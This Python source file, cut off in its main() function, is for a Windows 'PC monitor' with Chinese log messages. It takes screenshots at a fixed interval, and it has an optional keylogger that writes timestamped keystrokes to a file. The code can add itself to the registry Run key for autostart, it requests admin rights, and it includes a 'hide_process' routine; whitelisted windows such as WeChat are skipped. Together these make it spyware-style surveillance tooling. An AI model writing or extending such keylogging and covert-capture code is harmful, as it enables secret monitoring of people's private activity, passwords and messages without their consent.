import
os
import
sys
import
time
import
gc
import
json
import
logging
import
queue
import
threading
import
traceback
from
datetime
import
datetime
import
ctypes
from
ctypes
import
Structure, windll, c_long, c_int, c_uint
import
argparse
import
psutil
import
win32api
import
win32con
import
win32gui
import
win32process
import
win32security
import
winreg
from
PIL
import
ImageGrab
from
pynput
import
keyboard
from
concurrent.futures
import
ThreadPoolExecutor
class
POINT(Structure):
_fields_
=
[(
"x"
, c_long), (
"y"
, c_long)]
class
MSG(Structure):
_fields_
=
[(
"hwnd"
, c_int),
(
"message"
, c_uint),
(
"wParam"
, c_int),
(
"lParam"
, c_int),
(
"time"
, c_int),
(
"pt"
, POINT)]
user32
=
ctypes.windll.user32
MOD_ALT
=
0x0001
MOD_CONTROL
=
0x0002
MOD_SHIFT
=
0x0004
MOD_WIN
=
0x0008
WM_HOTKEY
=
0x0312
PROCESS_ALL_ACCESS
=
0x1F0FFF
PROCESS_VM_READ
=
0x0010
PROCESS_VM_WRITE
=
0x0020
PROCESS_VM_OPERATION
=
0x0008
PROCESS_QUERY_INFORMATION
=
0x0400
executor
=
ThreadPoolExecutor(max_workers
=
2
)
exit_event
=
threading.Event()
GLOBAL_KEYS_PRESSED
=
set
()
KEY_MONITORING_ACTIVE
=
True
KEYBOARD_STATE_BEFORE_SCREENSHOT
=
None
KEYBOARD_STATE_AFTER_SCREENSHOT
=
None
IS_TAKING_SCREENSHOT
=
False
KEYBOARD_MONITORING_SUSPENDED
=
False
HOT_KEY_COMBINATIONS
=
[
{
"name"
:
"Ctrl+Alt+X"
,
"keys"
: {keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char(
'x'
)}},
{
"name"
:
"Alt+X"
,
"keys"
: {keyboard.Key.alt, keyboard.KeyCode.from_char(
'x'
)}},
{
"name"
:
"Ctrl+Alt+Q"
,
"keys"
: {keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char(
'q'
)}},
{
"name"
:
"Ctrl+Alt+W"
,
"keys"
: {keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char(
'w'
)}},
{
"name"
:
"Alt+Shift+X"
,
"keys"
: {keyboard.Key.alt, keyboard.Key.shift, keyboard.KeyCode.from_char(
'x'
)}}
]
CURRENT_HOTKEY_COMBO
=
HOT_KEY_COMBINATIONS[
0
]
KEY_LISTENER
=
None
SLEEP_TIME
=
15
SAVE_PATH
=
"screenshots"
white_list
=
[]
KEYLOGGER_ENABLED
=
False
KEYLOGGER_RESPECT_WHITELIST
=
True
MEMORY_OPTIMIZE_INTERVAL
=
300
def
log_error(msg, exc
=
None
):
logging.error(msg)
if
exc:
logging.error(traceback.format_exc())
def
process_key(key, global_keys, prefix
=
""):
try
:
if
key
in
(keyboard.Key.ctrl, keyboard.Key.ctrl_l, keyboard.Key.ctrl_r):
global_keys.add(keyboard.Key.ctrl)
elif
key
in
(keyboard.Key.alt, keyboard.Key.alt_l, keyboard.Key.alt_r):
global_keys.add(keyboard.Key.alt)
elif
hasattr
(key,
'char'
)
and
key.char:
global_keys.add(keyboard.KeyCode.from_char(key.char.lower()))
else
:
global_keys.add(key)
if
(keyboard.Key.ctrl
in
global_keys
and
keyboard.Key.alt
in
global_keys
and
keyboard.KeyCode.from_char(
'x'
)
in
global_keys):
logging.info(f
"{prefix} 检测到热键组合: Ctrl+Alt+X"
)
handle_exit_hotkey()
return
False
for
combo
in
HOT_KEY_COMBINATIONS:
if
all
(k
in
global_keys
for
k
in
combo[
"keys"
]):
logging.info(f
"{prefix} 检测到热键组合: {combo['name']}"
)
handle_exit_hotkey()
return
False
except
Exception as e:
log_error(f
"{prefix} 按键处理出错: {str(e)}"
, e)
return
True
def
remove_key(key, global_keys, prefix
=
""):
try
:
if
key
in
(keyboard.Key.ctrl, keyboard.Key.ctrl_l, keyboard.Key.ctrl_r):
global_keys.discard(keyboard.Key.ctrl)
elif
key
in
(keyboard.Key.alt, keyboard.Key.alt_l, keyboard.Key.alt_r):
global_keys.discard(keyboard.Key.alt)
elif
hasattr
(key,
'char'
)
and
key.char:
global_keys.discard(keyboard.KeyCode.from_char(key.char.lower()))
else
:
global_keys.discard(key)
except
Exception as e:
log_error(f
"{prefix} 按键释放处理出错: {str(e)}"
, e)
return
True
def
check_for_key_combination():
global
GLOBAL_KEYS_PRESSED, CURRENT_HOTKEY_COMBO
lowercase_keys
=
set
()
for
k
in
GLOBAL_KEYS_PRESSED:
if
hasattr
(k,
'char'
)
and
k.char:
lowercase_keys.add(keyboard.KeyCode.from_char(k.char.lower()))
else
:
lowercase_keys.add(k)
if
CURRENT_HOTKEY_COMBO[
"keys"
].issubset(lowercase_keys):
logging.info(f
"[热键监控] 检测到热键组合: {CURRENT_HOTKEY_COMBO['name']}"
)
logging.info(f
"[热键监控] 当前按下的键: {GLOBAL_KEYS_PRESSED}"
)
handle_exit_hotkey()
return
True
return
False
def
handle_exit_hotkey():
logging.info(
"[热键事件] 退出热键被触发,程序即将退出"
)
exit_event.
set
()
gc.collect()
threading.Thread(target
=
lambda
: (time.sleep(
0.5
), os._exit(
0
)), daemon
=
True
).start()
def
start_keyboard_monitor():
global
KEY_LISTENER, KEY_MONITORING_ACTIVE
try
:
logging.info(
"[键盘监控] 启动键盘监听器"
)
KEY_MONITORING_ACTIVE
=
True
if
KEY_LISTENER:
try
:
KEY_LISTENER.stop()
KEY_LISTENER.join()
except
Exception as e:
logging.debug(f
"[键盘监控] 停止之前的监听器失败: {str(e)}"
)
def
simple_on_press(key):
if
IS_TAKING_SCREENSHOT:
return
True
return
process_key(key, GLOBAL_KEYS_PRESSED,
"[键盘监控]"
)
def
simple_on_release(key):
return
remove_key(key, GLOBAL_KEYS_PRESSED,
"[键盘监控]"
)
KEY_LISTENER
=
keyboard.Listener(
on_press
=
simple_on_press,
on_release
=
simple_on_release,
suppress
=
False
)
KEY_LISTENER.daemon
=
True
KEY_LISTENER.start()
logging.info(
"[键盘监控] 键盘监听器已启动"
)
return
True
except
Exception as e:
log_error(f
"[键盘监控] 启动键盘监听失败: {str(e)}"
, e)
return
False
def
stop_keyboard_monitor():
global
KEY_LISTENER, KEY_MONITORING_ACTIVE
try
:
logging.info(
"[键盘监控] 停止键盘监听器"
)
KEY_MONITORING_ACTIVE
=
False
if
KEY_LISTENER:
KEY_LISTENER.stop()
KEY_LISTENER
=
None
logging.info(
"[键盘监控] 键盘监听器已停止"
)
return
True
except
Exception as e:
log_error(f
"[键盘监控] 停止键盘监听失败: {str(e)}"
)
return
False
def
get_app_path():
if
getattr
(sys,
'frozen'
,
False
):
app_path
=
os.path.dirname(sys.executable)
else
:
app_path
=
os.path.dirname(os.path.abspath(__file__))
os.makedirs(os.path.join(app_path,
'config'
), exist_ok
=
True
)
return
app_path
def
setup_logging(save_path):
today
=
datetime.now().strftime(
'%Y-%m-%d'
)
log_dir
=
os.path.join(save_path, today)
os.makedirs(log_dir, exist_ok
=
True
)
for
handler
in
logging.root.handlers[:]:
logging.root.removeHandler(handler)
file_handler
=
logging.FileHandler(
os.path.join(log_dir,
'screenshot.log'
),
encoding
=
'utf-8'
,
mode
=
'a'
)
console_handler
=
logging.StreamHandler(sys.stdout)
formatter
=
logging.Formatter(
'%(asctime)s - %(message)s'
, datefmt
=
'%Y-%m-%d %H:%M:%S'
)
file_handler.setFormatter(formatter)
console_handler.setFormatter(formatter)
if
os.path.exists(os.path.join(log_dir,
'screenshot.log'
)):
with
open
(os.path.join(log_dir,
'screenshot.log'
),
'a'
, encoding
=
'utf-8'
) as f:
if
os.path.getsize(os.path.join(log_dir,
'screenshot.log'
))
=
=
0
:
f.write(
'\ufeff'
)
else
:
with
open
(os.path.join(log_dir,
'screenshot.log'
),
'w'
, encoding
=
'utf-8'
) as f:
f.write(
'\ufeff'
)
logging.root.setLevel(logging.INFO)
logging.root.addHandler(file_handler)
logging.root.addHandler(console_handler)
def
get_keylog_file(save_path):
try
:
today
=
datetime.now().strftime(
'%Y-%m-%d'
)
save_dir
=
os.path.join(save_path, today)
os.makedirs(save_dir, exist_ok
=
True
)
return
os.path.join(save_dir,
'keylog.txt'
)
except
Exception as e:
logging.error(f
"获取键盘记录文件路径失败: {str(e)}"
)
return
os.path.join(os.getcwd(),
'keylog.txt'
)
def
hide_process():
try
:
current_pid
=
win32api.GetCurrentProcessId()
handle
=
win32api.OpenProcess(PROCESS_ALL_ACCESS,
False
, current_pid)
win32process.SetPriorityClass(handle, win32process.BELOW_NORMAL_PRIORITY_CLASS)
win32api.CloseHandle(handle)
logging.info(
"进程已隐藏"
)
except
Exception as e:
logging.error(f
"隐藏进程失败: {str(e)}"
)
def
optimize_memory():
try
:
gc.collect()
process
=
psutil.Process()
process.nice(psutil.BELOW_NORMAL_PRIORITY_CLASS)
logging.info(
"内存已优化"
)
except
Exception as e:
log_error(f
"内存优化失败: {str(e)}"
)
def
is_white_window_open():
active_window
=
win32gui.GetForegroundWindow()
active_title
=
win32gui.GetWindowText(active_window)
if
active_title
in
white_list:
if
win32gui.IsWindowVisible(active_window):
placement
=
win32gui.GetWindowPlacement(active_window)
if
placement[
1
] !
=
win32con.SW_SHOWMINIMIZED:
logging.debug(f
"检测到活动的白名单窗口: {active_title}"
)
return
True
logging.debug(f
"当前活动窗口不在白名单中: {active_title}"
)
return
False
def
add_to_startup(config
=
None
):
try
:
if
not
config
or
not
config.get(
'auto_start'
,
False
):
logging.info(
"开机自启动已禁用"
)
return
key_path
=
r
"Software\Microsoft\Windows\CurrentVersion\Run"
key
=
winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path,
0
, winreg.KEY_ALL_ACCESS)
if
getattr
(sys,
'frozen'
,
False
):
executable_path
=
sys.executable
winreg.SetValueEx(key,
"PCMonitor"
,
0
, winreg.REG_SZ, f
'"{executable_path}"'
)
else
:
script_path
=
os.path.abspath(__file__)
winreg.SetValueEx(key,
"PCMonitor"
,
0
, winreg.REG_SZ, f
'pythonw "{script_path}"'
)
winreg.CloseKey(key)
logging.info(
"已添加到开机自启动"
)
except
Exception as e:
log_error(f
"添加开机自启动失败: {str(e)}"
)
def
get_active_window_info():
active_window
=
win32gui.GetForegroundWindow()
active_title
=
win32gui.GetWindowText(active_window)
return
active_title
def
keylogger_on_key_press(key, save_path, respect_whitelist):
try
:
if
respect_whitelist
and
is_white_window_open():
return
current_time
=
datetime.now().strftime(
'%Y-%m-%d %H:%M:%S'
)
try
:
char
=
key.char
if
hasattr
(key,
'char'
)
else
str
(key)
with
open
(get_keylog_file(save_path),
'a'
, encoding
=
'utf-8'
) as f:
f.write(f
"{current_time} - {char}\n"
)
except
Exception as e:
log_error(f
"记录按键失败: {str(e)}"
)
except
Exception as e:
log_error(f
"键盘处理错误: {str(e)}"
)
def
keylogger_on_key_release(key, save_path, respect_whitelist):
pass
def
start_keylogger(save_path, respect_whitelist):
if
KEYLOGGER_ENABLED:
logging.info(
"键盘记录功能已启动"
)
if
not
save_path:
save_path
=
os.getcwd()
logging.warning(f
"save_path未设置,使用当前目录: {save_path}"
)
keylog_file
=
get_keylog_file(save_path)
if
not
os.path.exists(keylog_file):
with
open
(keylog_file,
'w'
, encoding
=
'utf-8'
) as f:
f.write(
'\ufeff'
)
def
on_press(key):
keylogger_on_key_press(key, save_path, respect_whitelist)
def
on_release(key):
pass
keyboard_listener
=
keyboard.Listener(on_press
=
on_press, on_release
=
on_release)
keyboard_listener.start()
return
keyboard_listener
return
None
def
show_startup_message(config
=
None
, hkey_manager
=
None
):
keylog_status
=
'已启用'
if
KEYLOGGER_ENABLED
else
'已禁用'
keylog_details
=
""
if
KEYLOGGER_ENABLED:
keylog_details
=
f
",键盘记录路径: {get_keylog_file(SAVE_PATH)}"
else
:
keylog_details
=
",使用 --keylog 参数启用键盘记录"
auto_start_status
=
'已启用'
if
config
and
config.get(
'auto_start'
,
False
)
else
'已禁用'
auto_start_details
=
",在config.json中设置auto_start为true启用"
if
not
(config
and
config.get(
'auto_start'
,
False
))
else
""
current_hotkey
=
"未知"
if
hkey_manager
and
hasattr
(hkey_manager,
'current_hotkey'
)
and
hkey_manager.current_hotkey:
current_hotkey
=
hkey_manager.current_hotkey
logging.info(f
"电脑监控程序已启动 - 配置信息:"
)
logging.info(f
"保存路径: {SAVE_PATH}"
)
logging.info(f
"截图间隔: {SLEEP_TIME}秒"
)
logging.info(f
"退出快捷键: {current_hotkey}"
)
logging.info(f
"白名单应用: {', '.join(white_list)}"
)
logging.info(f
"键盘记录: {keylog_status}{keylog_details}"
)
logging.info(f
"开机自启动: {auto_start_status}{auto_start_details}"
)
def
show_hotkey_conflict_message():
error_msg
=
(
"所有退出热键组合都已被其他程序占用。"
"请尝试以下操作:"
"1. 检查是否有其他监控程序正在运行"
"2. 检查任务管理器中是否有本程序的其他实例"
"3. 重新启动本程序"
"4. 如果问题仍然存在,请重启电脑"
"程序将退出。"
)
logging.error(
"热键冲突:所有退出热键组合都已被其他程序占用"
)
logging.error(
"程序将退出"
)
sys.exit(
1
)
def
is_admin():
try
:
return
ctypes.windll.shell32.IsUserAnAdmin()
except
:
return
False
def
run_as_admin():
try
:
if
sys.argv[
0
].endswith(
'.py'
):
script_path
=
os.path.abspath(sys.argv[
0
])
args
=
' '
.join(sys.argv[
1
:])
cmd
=
f
'"{sys.executable}" "{script_path}" {args}'
else
:
cmd
=
f
'"{sys.executable}"'
ctypes.windll.shell32.ShellExecuteW(
None
,
"runas"
,
sys.executable,
cmd,
None
,
1
)
logging.info(
"请求管理员权限重新运行程序"
)
except
Exception as e:
log_error(f
"请求管理员权限失败: {str(e)}"
)
def
check_hotkey_available():
hwnd
=
None
wc
=
None
try
:
wc
=
win32gui.WNDCLASS()
wc.lpfnWndProc
=
lambda
hwnd, msg, wparam, lparam: win32gui.DefWindowProc(hwnd, msg, wparam, lparam)
wc.lpszClassName
=
"TempHotKeyWindow"
wc.hInstance
=
win32api.GetModuleHandle(
None
)
try
:
win32gui.RegisterClass(wc)
except
Exception:
try
:
win32gui.UnregisterClass(wc.lpszClassName, wc.hInstance)
win32gui.RegisterClass(wc)
except
Exception as e:
log_error(f
"注册窗口类失败: {str(e)}"
)
return
True
hwnd
=
win32gui.CreateWindow(
wc.lpszClassName,
None
,
win32con.WS_OVERLAPPED,
0
,
0
,
0
,
0
,
0
,
0
,
wc.hInstance,
None
)
if
not
hwnd:
log_error(
"创建临时窗口失败"
)
return
True
try
:
try
:
ctypes.windll.user32.UnregisterHotKey(hwnd,
1
)
except
:
pass
time.sleep(
0.1
)
if
ctypes.windll.user32.RegisterHotKey(hwnd,
1
, MOD_CONTROL | MOD_ALT,
ord
(
'X'
)):
ctypes.windll.user32.UnregisterHotKey(hwnd,
1
)
return
True
else
:
error_code
=
ctypes.windll.kernel32.GetLastError()
if
error_code
=
=
1409
:
logging.warning(f
"热键已被其他程序注册 (错误代码: {error_code})"
)
return
False
else
:
log_error(f
"注册热键失败,错误代码: {error_code}"
)
return
True
except
Exception as e:
log_error(f
"注册热键时发生异常: {str(e)}"
, e)
return
True
except
Exception as e:
log_error(f
"检查热键可用性时发生异常: {str(e)}"
, e)
return
True
finally
:
if
hwnd:
try
:
ctypes.windll.user32.UnregisterHotKey(hwnd,
1
)
except
:
pass
try
:
win32gui.DestroyWindow(hwnd)
except
:
pass
if
wc:
try
:
win32gui.UnregisterClass(wc.lpszClassName, wc.hInstance)
except
:
pass
gc.collect()
return
True
def
run_main_loop(screenshot_manager):
logging.info(
"主循环开始运行"
)
last_memory_optimize
=
time.time()
last_screenshot_time
=
time.time()
screenshot_count
=
0
last_heartbeat_time
=
time.time()
try
:
while
True
:
try
:
current_time
=
time.time()
if
current_time
-
last_heartbeat_time >
=
10
:
logging.info(f
"程序运行中 - 已截图: {screenshot_count}张"
)
last_heartbeat_time
=
current_time
if
exit_event.is_set():
logging.info(
"检测到退出事件,准备退出程序"
)
break
current_time
=
time.time()
if
current_time
-
last_screenshot_time >
=
SLEEP_TIME:
active_title
=
get_active_window_info()
logging.info(f
"当前活动窗口: {active_title}"
)
window_in_whitelist
=
active_title
in
white_list
if
window_in_whitelist:
logging.info(f
"窗口在白名单中,跳过截图: {active_title}"
)
else
:
today
=
datetime.now().strftime(
'%Y-%m-%d'
)
save_dir
=
os.path.join(SAVE_PATH, today)
os.makedirs(save_dir, exist_ok
=
True
)
logging.info(f
"添加截图任务: {active_title}"
)
screenshot_manager.add_task(active_title, save_dir)
screenshot_count
+
=
1
logging.info(f
"截图数量: {screenshot_count}"
)
last_screenshot_time
=
current_time
if
current_time
-
last_memory_optimize >
=
MEMORY_OPTIMIZE_INTERVAL:
logging.info(
"执行内存优化"
)
optimize_memory()
last_memory_optimize
=
current_time
time.sleep(
0.1
)
except
Exception as e:
log_error(f
"主循环错误: {str(e)}"
, e)
time.sleep(
0.5
)
except
KeyboardInterrupt:
logging.info(
"接收到键盘中断,准备退出"
)
finally
:
logging.info(
"主循环结束"
)
def
cleanup_resources(screenshot_manager, hotkey_manager, keyboard_listener, backup_hotkey_hwnd):
exit_event.
set
()
try
:
logging.info(
"正在清理资源..."
)
if
screenshot_manager:
screenshot_manager.stop()
if
hotkey_manager:
hotkey_manager.stop()
if
keyboard_listener:
keyboard_listener.stop()
if
backup_hotkey_hwnd:
try
:
if
isinstance
(backup_hotkey_hwnd, keyboard.Listener):
backup_hotkey_hwnd.stop()
logging.info(
"[备用热键] 备用热键监听器已停止"
)
else
:
ctypes.windll.user32.UnregisterHotKey(backup_hotkey_hwnd,
1
)
win32gui.DestroyWindow(backup_hotkey_hwnd)
logging.info(
"[备用热键] 备用热键资源已清理"
)
except
Exception as e:
log_error(f
"[备用热键] 清理备用热键资源失败: {str(e)}"
)
except
Exception as e:
log_error(f
"清理资源时发生错误: {str(e)}"
)
logging.info(
"服务已停止"
)
gc.collect()
class
HotkeyManager:
def
__init__(
self
, config_manager
=
None
):
self
.config_manager
=
config_manager
self
.current_hotkey
=
None
self
.running
=
False
self
.key_monitor_thread
=
None
self
.available_hotkeys
=
[
{
"name"
:
"Ctrl+Alt+X"
,
"keys"
: {keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char(
'x'
)}},
{
"name"
:
"Alt+X"
,
"keys"
: {keyboard.Key.alt, keyboard.KeyCode.from_char(
'x'
)}},
{
"name"
:
"Ctrl+Alt+Q"
,
"keys"
: {keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char(
'q'
)}},
{
"name"
:
"Ctrl+Alt+W"
,
"keys"
: {keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char(
'w'
)}},
{
"name"
:
"Alt+Shift+X"
,
"keys"
: {keyboard.Key.alt, keyboard.Key.shift, keyboard.KeyCode.from_char(
'x'
)}},
]
self
._load_custom_hotkeys()
def
_load_custom_hotkeys(
self
):
if
not
self
.config_manager
or
not
self
.config_manager.config:
return
custom_hotkeys
=
self
.config_manager.config.get(
"custom_hotkeys"
, [])
if
not
custom_hotkeys:
return
for
hotkey
in
custom_hotkeys:
if
not
isinstance
(hotkey,
dict
)
or
"name"
not
in
hotkey:
continue
try
:
key_set
=
self
._parse_hotkey_string(hotkey[
"name"
])
if
key_set:
self
.available_hotkeys.insert(
0
, {
"name"
: hotkey[
"name"
],
"keys"
: key_set})
except
Exception as e:
log_error(f
"[热键管理] 解析自定义热键失败: {hotkey['name']}, 错误: {str(e)}"
)
self
._set_preferred_hotkey_priority()
def
_parse_hotkey_string(
self
, hotkey_str):
key_set
=
set
()
name_parts
=
hotkey_str.split(
'+'
)
for
part
in
name_parts[:
-
1
]:
part
=
part.strip().lower()
if
part
=
=
"ctrl"
:
key_set.add(keyboard.Key.ctrl)
elif
part
=
=
"alt"
:
key_set.add(keyboard.Key.alt)
elif
part
=
=
"shift"
:
key_set.add(keyboard.Key.shift)
elif
part
=
=
"win"
:
key_set.add(keyboard.Key.cmd)
main_key
=
name_parts[
-
1
].strip().lower()
if
len
(main_key)
=
=
1
:
key_set.add(keyboard.KeyCode.from_char(main_key))
return
key_set
def
_set_preferred_hotkey_priority(
self
):
if
not
self
.config_manager
or
not
self
.config_manager.config:
return
preferred_hotkey
=
self
.config_manager.config.get(
"preferred_hotkey"
, "")
if
preferred_hotkey:
for
i, hotkey
in
enumerate
(
self
.available_hotkeys):
if
hotkey[
"name"
]
=
=
preferred_hotkey:
self
.available_hotkeys.insert(
0
,
self
.available_hotkeys.pop(i))
break
def
start(
self
):
logging.info(
"[热键管理] 开始初始化热键管理器"
)
if
not
self
.check_hotkey_available():
log_error(
"[热键管理] 没有可用的热键组合"
)
return
False
global
CURRENT_HOTKEY_COMBO
CURRENT_HOTKEY_COMBO
=
next
((combo
for
combo
in
self
.available_hotkeys
if
combo[
"name"
]
=
=
self
.current_hotkey),
None
)
self
.running
=
True
start_keyboard_monitor()
logging.info(f
"[热键管理] 热键管理器已启动,当前热键: {self.current_hotkey}"
)
if
self
.config_manager
and
self
.current_hotkey:
self
.config_manager.set_preferred_hotkey(
self
.current_hotkey)
self
.key_monitor_thread
=
threading.Thread(target
=
self
._monitor_keyboard_listener, daemon
=
True
)
self
.key_monitor_thread.start()
return
True
def
check_hotkey_available(
self
):
try
:
logging.info(
"[热键管理] 开始检查可用热键组合"
)
if
not
self
.available_hotkeys:
log_error(
"[热键管理] 没有定义热键组合"
)
return
False
self
.current_hotkey
=
self
.available_hotkeys[
0
][
"name"
]
logging.info(f
"[热键管理] 选择热键: {self.current_hotkey}"
)
return
True
except
Exception as e:
log_error(f
"[热键管理] 检查热键可用性失败: {str(e)}"
, e)
return
False
def
_monitor_keyboard_listener(
self
):
retry_count
=
0
while
self
.running
and
not
exit_event.is_set():
try
:
if
KEY_LISTENER
is
None
or
not
KEY_LISTENER.is_alive():
retry_count
+
=
1
logging.warning(f
"[热键管理] 键盘监听器已停止,尝试重启 ({retry_count})"
)
start_keyboard_monitor()
if
retry_count >
=
5
:
check_for_key_combination()
if
retry_count
%
10
=
=
0
and
retry_count >
0
:
logging.info(f
"[热键管理] 热键状态: 已设置={self.current_hotkey}, 监听器活跃={KEY_LISTENER and KEY_LISTENER.is_alive()}"
)
retry_count
=
0
time.sleep(
0.5
)
except
Exception as e:
log_error(f
"[热键管理] 监控键盘监听器时出错: {str(e)}"
, e)
time.sleep(
1
)
def
stop(
self
):
logging.info(
"[热键管理] 正在停止热键管理器"
)
self
.running
=
False
stop_keyboard_monitor()
if
self
.key_monitor_thread
and
self
.key_monitor_thread.is_alive():
try
:
self
.key_monitor_thread.join(timeout
=
1.0
)
except
Exception as e:
log_error(f
"[热键管理] 停止监控线程失败: {str(e)}"
)
logging.info(
"[热键管理] 热键管理器已停止"
)
class
ConfigManager:
def
__init__(
self
):
self
.config
=
None
self
.config_path
=
None
self
.default_config
=
{
"white_list"
: [
'微信'
,
'WeChat'
,
'聊天文件'
,
'朋友圈'
],
"save_path"
:
"D:/doc/pcmon"
,
"sleep_time"
:
5
,
"keylogger_enabled"
:
False
,
"keylogger_respect_whitelist"
:
True
,
"auto_start"
:
False
,
"preferred_hotkey"
: "",
"custom_hotkeys"
: []
}
def
load(
self
):
config_dir
=
os.path.join(get_app_path(),
'config'
)
self
.config_path
=
os.path.join(config_dir,
'config.json'
)
os.makedirs(config_dir, exist_ok
=
True
)
if
not
os.path.exists(
self
.config_path):
self
._create_default_config()
return
self
.config
try
:
with
open
(
self
.config_path,
'r'
, encoding
=
'utf-8'
) as f:
config
=
json.load(f)
if
not
all
(key
in
config
for
key
in
self
.default_config):
config
=
{
*
*
self
.default_config,
*
*
config}
self
._save_config(config)
self
.config
=
config
return
config
except
Exception as e:
log_error(f
"加载配置文件失败: {str(e)}"
)
self
.config
=
self
.default_config
return
self
.default_config
def
_create_default_config(
self
):
try
:
with
open
(
self
.config_path,
'w'
, encoding
=
'utf-8'
) as f:
json.dump(
self
.default_config, f, ensure_ascii
=
False
, indent
=
4
)
logging.info(
"已创建默认配置文件"
)
self
.config
=
self
.default_config
except
Exception as e:
log_error(f
"创建默认配置文件失败: {str(e)}"
)
self
.config
=
self
.default_config
def
_save_config(
self
, config):
try
:
with
open
(
self
.config_path,
'w'
, encoding
=
'utf-8'
) as f:
json.dump(config, f, ensure_ascii
=
False
, indent
=
4
)
return
True
except
Exception as e:
log_error(f
"保存配置文件失败: {str(e)}"
)
return
False
def
save(
self
):
if
self
.config
and
self
.config_path:
return
self
._save_config(
self
.config)
return
False
def
set_preferred_hotkey(
self
, hotkey_name):
if
self
.config:
self
.config[
"preferred_hotkey"
]
=
hotkey_name
return
self
.save()
return
False
class
ScreenshotManager:
def
__init__(
self
, save_path, interval):
self
.save_path
=
save_path
self
.interval
=
interval
self
.task_queue
=
queue.Queue()
self
.running
=
False
self
.thread
=
None
self
.worker_thread
=
None
self
.MEMORY_OPTIMIZE_INTERVAL
=
300
def
start(
self
):
logging.info(
"[截图管理] 启动截图管理器"
)
self
.running
=
True
self
.thread
=
threading.Thread(target
=
self
._process_queue, daemon
=
True
)
self
.thread.start()
today
=
datetime.now().strftime(
'%Y-%m-%d'
)
save_dir
=
os.path.join(
self
.save_path, today)
os.makedirs(save_dir, exist_ok
=
True
)
logging.info(f
"[截图管理] 截图管理器已启动,保存目录: {save_dir}"
)
return
True
def
stop(
self
):
logging.info(
"[截图管理] 停止截图管理器"
)
self
.running
=
False
if
self
.thread
and
self
.thread.is_alive():
try
:
self
.thread.join(timeout
=
2.0
)
logging.info(
"[截图管理] 截图处理线程已停止"
)
except
Exception as e:
log_error(f
"[截图管理] 停止截图处理线程失败: {str(e)}"
)
logging.info(
"[截图管理] 截图管理器已停止"
)
def
add_task(
self
, window_title, save_dir):
try
:
os.makedirs(save_dir, exist_ok
=
True
)
timestamp
=
datetime.now().strftime(
'%Y%m%d_%H%M%S'
)
filename
=
f
"screenshot_{timestamp}.png"
filepath
=
os.path.join(save_dir, filename)
self
.task_queue.put((window_title, filepath))
return
True
except
Exception as e:
log_error(f
"[截图管理] 添加截图任务失败: {str(e)}"
)
return
False
def
_process_queue(
self
):
while
self
.running:
try
:
if
self
.task_queue.empty():
time.sleep(
0.1
)
continue
window_title, filepath
=
self
.task_queue.get(block
=
False
)
self
._take_screenshot(window_title, filepath)
self
.task_queue.task_done()
except
queue.Empty:
time.sleep(
0.1
)
except
Exception as e:
log_error(f
"[截图管理] 处理截图队列出错: {str(e)}"
)
time.sleep(
0.5
)
def
_take_screenshot(
self
, window_title, filepath):
global
IS_TAKING_SCREENSHOT, KEYBOARD_STATE_BEFORE_SCREENSHOT, KEYBOARD_STATE_AFTER_SCREENSHOT
try
:
IS_TAKING_SCREENSHOT
=
True
if
'KEYBOARD_STATE_BEFORE_SCREENSHOT'
in
globals
():
KEYBOARD_STATE_BEFORE_SCREENSHOT
=
GLOBAL_KEYS_PRESSED.copy()
if
GLOBAL_KEYS_PRESSED
else
set
()
save_dir
=
os.path.dirname(filepath)
if
not
os.path.exists(save_dir):
os.makedirs(save_dir, exist_ok
=
True
)
screenshot
=
ImageGrab.grab()
screenshot.save(filepath)
if
'KEYBOARD_STATE_AFTER_SCREENSHOT'
in
globals
():
KEYBOARD_STATE_AFTER_SCREENSHOT
=
GLOBAL_KEYS_PRESSED.copy()
if
GLOBAL_KEYS_PRESSED
else
set
()
logging.info(f
"[截图管理] 截图已保存: {filepath}, 窗口: {window_title}"
)
return
True
except
Exception as e:
log_error(f
"[截图管理] 截图失败: {str(e)}"
)
return
False
finally
:
IS_TAKING_SCREENSHOT
=
False
def
create_backup_hotkey_listener():
try
:
hwnd
=
win32gui.CreateWindow(
"STATIC"
,
None
,
win32con.WS_OVERLAPPED,
0
,
0
,
0
,
0
,
0
,
0
,
win32api.GetModuleHandle(
None
),
None
)
if
hwnd:
if
ctypes.windll.user32.RegisterHotKey(hwnd,
1
, MOD_CONTROL | MOD_ALT,
ord
(
'X'
)):
logging.info(
"[备用热键] 系统级热键注册成功"
)
def
msg_loop():
try
:
msg
=
MSG()
while
not
exit_event.is_set():
if
ctypes.windll.user32.PeekMessageW(ctypes.byref(msg), hwnd,
0
,
0
,
1
):
if
msg.message
=
=
WM_HOTKEY:
logging.info(
"[备用热键] 检测到系统级热键"
)
handle_exit_hotkey()
ctypes.windll.user32.TranslateMessage(ctypes.byref(msg))
ctypes.windll.user32.DispatchMessageW(ctypes.byref(msg))
time.sleep(
0.1
)
except
Exception as e:
log_error(f
"[备用热键] 消息循环异常: {str(e)}"
)
threading.Thread(target
=
msg_loop, daemon
=
True
).start()
return
hwnd
else
:
logging.warning(
"[备用热键] 系统级热键注册失败,尝试使用pynput备用"
)
win32gui.DestroyWindow(hwnd)
def
on_press(key):
try
:
if
key
=
=
keyboard.Key.esc:
logging.info(
"[备用热键] 检测到ESC键"
)
handle_exit_hotkey()
return
False
except
Exception as e:
log_error(f
"[备用热键] 处理按键异常: {str(e)}"
)
backup_listener
=
keyboard.Listener(on_press
=
on_press)
backup_listener.daemon
=
True
backup_listener.start()
logging.info(
"[备用热键] 使用pynput备用热键监听器"
)
return
backup_listener
except
Exception as e:
log_error(f
"[备用热键] 创建备用热键监听器失败: {str(e)}"
)
return
None
def
main():
global
SLEEP_TIME, white_list, KEYLOGGER_ENABLED, KEYLOGGER_RESPECT_WHITELIST, SAVE_PATH
global
MEMORY_OPTIMIZE_INTERVAL, IS_TAKING_SCREENSHOT
global
KEYBOARD_STATE_BEFORE_SCREENSHOT, KEYBOARD_STATE_AFTER_SCREENSHOT
screenshot_manager
=
None
hotkey_manager
=
None
keyboard_listener
=
None
backup_hotkey_hwnd
=
None
try
:
parser
=
argparse.ArgumentParser(description
=
"电脑监控程序"
)
parser.add_argument(
"--sleep"
,
type
=
int
, default
=
5
,
help
=
"截屏间隔时间 默认5秒"
)
parser.add_argument(
"--save_path"
,
